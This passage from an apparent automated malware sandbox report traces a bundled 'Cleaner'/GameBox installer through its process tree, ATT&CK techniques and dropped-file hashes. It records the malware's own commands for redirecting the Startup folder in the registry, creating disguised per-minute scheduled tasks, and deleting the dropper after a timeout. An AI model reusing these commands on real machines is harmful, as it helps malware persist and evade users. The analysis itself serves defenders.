                                                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_A418.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                            PID:8332
                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                        PID:6760
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                        PID:6444
                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                        PID:5396
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                        PID:8636
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        PID:9108
                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                        PID:8516
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          PID:7560
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\12D9.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\12D9.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        PID:4220
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        PID:8356
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2380
                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                          PID:6984
                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{33806a21-cd73-0447-b664-f05f4947801a}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000164" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                            PID:2396
                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                            PID:1016
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\469C.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\469C.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:8920
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2292
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:8376
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:3932
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                      PID:8880
                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                  PID:7508
                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:7088
                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                    PID:8904
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\808A.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\808A.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:7404
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\x1HO07lKBO.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\x1HO07lKBO.exe"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:5832
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                          PID:8264
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\808A.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                        PID:1568
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                          timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                          PID:8556
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\q0J7sJSyOo.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\q0J7sJSyOo.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:7500
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:8040
                                                                                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                          PID:8892
                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                            MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                            PID:8476
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:8144
                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                          PID:8224
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:6352
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          PID:9012
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                          PID:5504
                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                          PID:5584
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:2212
                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                          PID:2028
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:7324
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          PID:7028
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          PID:4740
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          PID:7696
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:8436
                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:4548
                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                            PID:6776
                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:4776
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                              PID:2776
                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                              PID:6672
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                              PID:7004
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                              PID:9036
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                              PID:7872
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                              PID:3356
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                              PID:5360
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                              PID:6624
                                                                                                                                                                                                                                            • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                              C:\Windows\system32\AUDIODG.EXE 0x408
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:6988
                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:3064

                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                Software Discovery

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1518

                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1018

                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  4abfaa5c65ef1bda178bb0ae3532454c

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  21da67c8bf7c02917d6e41de07c2233c4a238035

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  a8de191a0b69f52442075daad2b131a75ec014b81779198e4d7c002d5ff5cb89

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  507539c7930d8fda8c6d33b942938094e4b460b91ccd371e46331bce7f49cce3d90f2bc2a608ec7bacabc127038f5f4a46f23411fe2f178a2cdb7ea0ab4f2561

                                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  4abfaa5c65ef1bda178bb0ae3532454c

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  21da67c8bf7c02917d6e41de07c2233c4a238035

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  a8de191a0b69f52442075daad2b131a75ec014b81779198e4d7c002d5ff5cb89

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  507539c7930d8fda8c6d33b942938094e4b460b91ccd371e46331bce7f49cce3d90f2bc2a608ec7bacabc127038f5f4a46f23411fe2f178a2cdb7ea0ab4f2561

                                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
